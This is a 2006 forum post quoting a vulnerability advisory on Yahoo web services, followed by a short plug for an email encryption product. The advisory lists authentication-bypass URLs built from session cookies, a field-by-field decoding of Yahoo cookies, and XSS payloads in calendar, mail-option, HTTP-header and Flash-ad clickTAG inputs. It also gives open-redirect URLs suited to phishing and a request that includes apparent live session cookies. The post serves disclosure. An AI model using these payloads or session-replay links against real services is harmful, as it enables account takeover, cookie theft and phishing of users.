|
Posted by privacy concerned on June 22, 2006, 4:35 pm
If you were Registered and logged in, you could reply and use other advanced thread options
rajesh.sethumadhava@gmail.com wrote:
> Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
> Cookie Encoding Security Weakness, Cross-Site Scripting and URL
> Redirection)
>
> ############################################################################
> #
> # XDisclose Advisory : XD100001
> # Advisory Released : 20th June 06
> # Credit : Rajesh Sethumadhavan
> #
> # Class : Authentication Bypass
> # Session Binding Vulnerability
> # Cookies Encoding Security Weakness
> # Cross-Site Scripting
> # URL redirection
> # Severity : Medium
> # Solution Status : Unpatched
> # Vendor : Yahoo
> # Affected applications : Yahoo multiple web-based services
> #
> ############################################################################
>
>
> Overview:
> Yahoo! Inc. is an American computer services company with a mission to
> "be
> the most essential global Internet service for consumers and
> businesses". It
> operates an Internet portal, including the popular Yahoo!
> Mail.According to
> Web trends Yahoo! is the most visited website on the Internet today
> with more
> than 400 million unique users. The global network of Yahoo! websites
> received
> 3.4 billion page views per day on average as of October 2005.
>
> Various Yahoo! services are vulnerable to authentication bypass,
> session
> binding, weak cookie encoding, cross-site scripting file inclusion and
> url
> redirection vulnerabilities, which is caused due to improper validation
> of
> user-supplied inputs.
>
> Description:
> Multiple vulnerabilities exist in various Yahoo services.
>
>
> 1. Authentication Bypass and Session Binding Vulnerability.
> A malicious user can log on to the yahoo without submitting the
> username
> and password by constructing a malicious URL using cookies.
>
> Same session (URL) can be used to login multiple times from multiple
> IP
> address leading to session binding vulnerability.
>
> POC: (UPDATED)
>
>
> --------------------------------------------------------------------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
>
> %26l=i42.j4ij/o&.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
>
> BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E--&.done=http%3a//mail.yahoo.com
>
> --------------------------------------------------------------------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
>
> %26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMU
>
> FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E-&.done=http
> %3a//mail.yahoo.com
>
> --------------------------------------------------------------------------
>
> Where in "sk" & "d" is session
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png
>
>
>
> 2. Cookie Encoding Security Weakness
> Implementation of cookies in yahoo is too weak that it can be
> decoded
> easily. A malicious attacker can easily collect many personal
> information
> using cookies like year of birth, zipcode, country and name which
> can be
> used to get password from "yahoo forgot password".
>
> Where in
> sk & d is session
> n is password
> l is username
> p is country, year of birth, gender and more
> b is cookies created
> lg is language
> intl is international language
> iz is zipcode
> jb is Industry and title
>
> POC Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png
>
> 3. Cross-Site Scripting.
> This vulnerability is resulted from the failure of Yahoo! filtering
> engine
> to block cretin user-supplied inputs
>
> a) Yahoo Calendar Service XSS
> The flaws are due to improper sanitization of inputs passed to
> "Location", "Address", "Street" and "Phone".
>
> ========================================================================
> This event repeats every day.
> </font><br>
> <font face="Arial" size=-1>
> <b>Event Location</b>: <script>alert('Location')</script>
> <br><b>Street</b>: <script>alert('Address')</script>
> <br><b>City, State, Zip</b>: <script>alert('Street')</script>
> <br><b>Phone</b>: <script>alert('Phone')</script>
> </font><br>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png
>
>
> b) Yahoo Options Mail Account XSS
> The flaws are due to improper sanitization of inputs passed to "Name"
> and "Reply to" parameters.
>
>
> ========================================================================
> <tr valign="top">
> <td>Name:</td>
> <td><script>alert('Name')</script></td>
> </tr>
>
> <tr valign="top">
> <td>Email:</td>
> </tr>
> <tr valign="top">
> <td>Reply-To:</td>
> </tr>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
> http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png
>
>
> c) Yahoo Options Filter XSS.
> The flaws are due to improper sanitization of inputs passed to "From"
> and "To" parameters
>
> ========================================================================
> <b>From</b> contains
> <br>
> <b>To/CC</b> contains
> <br>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
> http://www.xdisclose.bravehost.com/Images/Xss Filter To.png
>
>
> d) Yahoo Ads flash file XSS.
> The flaws are due to improper sanitization of inputs passed to flash
> Ads
> files
>
> Exploit:
> -----------------------------------------------------------------------
> http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
> 20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20
> Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
> 20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG=
> javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20
> Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS
> %20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300x250.swf?
> clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
> By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
> 20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
> 20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript:
> alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> and more
> -----------------------------------------------------------------------
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png
>
>
> e) Yahoo Mail Beta HTTP Header XSS
> The flaws are due to improper sanitization of inputs passed to all
> HTTP
> header like Accept, Accept-Charset, Accept-Language, Cache-Control,
> Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma,
> SOAPAction and User-Agent in Yahoo Mail Beta.
>
> POC :
> ========================================================================
> GET :
> http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7/zcUU2
>
> Host: uk.f555.mail.yahoo.com
> User-Agent: <script>alert('User-Agent:')</script>
> Accept:
> text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
> text/plain;q=0.8,image/png,*/*;q=0.5;<script>alert('Accept:')</script>
> Accept-Language:
> en-us,en;q=0.5;<script>alert('Accept-Language:')</script>
> Accept-Encoding:
> gzip,deflate;<script>alert('Accept-Encoding:')</script>
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
> ('Accept-Charset:')</script>
> Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
> Connection: keep-alive;<script>alert('Connection:')</script>
> SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:')
> </script>
> Content-Length: <script>alert('Content-Length:')</script>
> Content-Type: application/xml;<script>alert('Content-Type:')</script>
> Cookie: B=dcnl4j129c7tu&b=3&s=j3;
> F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq;
> Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19|24|&iz=123456
> r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
> T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV&
> d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0
> E-;
> U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11;
> YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script>
> Pragma: no-cache;<script>alert('Pragma:')</script>
> Cache-Control: no-cache;<script>alert('Cache-Control:')</script>
> ========================================================================
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Accept-Charset.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Accept-Language.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Cache-Control.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Content-Length.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Content-Type.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png
>
>
> Impact:
> Successful exploitation allows execution of arbitrary script code
> in a users browser session in context of an affected site which may
> allow to steal cookie based authentication credentials.
>
> 3. URL redirection.
> This is due failure of filtering of incoming untrusted data before
> the
> content reaches their users .This can be exploited for phishing
> attack. The
> vulnerable parameters are yahoo search web, image, video,
> preferences, cache,
> yahoo answers and more urls containing /*http://yahoo.com or
> /**http://
> yahoo.com
>
> Exploit:
>
> ---------------------------------------------------------------------------
>
> http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/EXP=
> 1148028186/**http%3a//www.xdisclose.com
>
> http://search.yahoo.com/preferences/preferences?pref_done=
> http%3a//www.xdisclose.com
>
> ---------------------------------------------------------------------------
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/URL Redirection
> WebSearch.png
> http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
> http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png
>
> 4) Interesting facts about Yahoo
> Yahoo Mail Inbox shows wrong unread messages count if it is above
> 65535
> unread messages.
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png
>
> Original Advisory:
> http://www.xdisclose.com/XD100001.txt
>
> Credits:
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability
>
Wow! Should you start encrypting emails in your Yahoo Mail account now?
You can do this easily using EaSecure available at
http://www.easecure.com/ .
| 
XML site map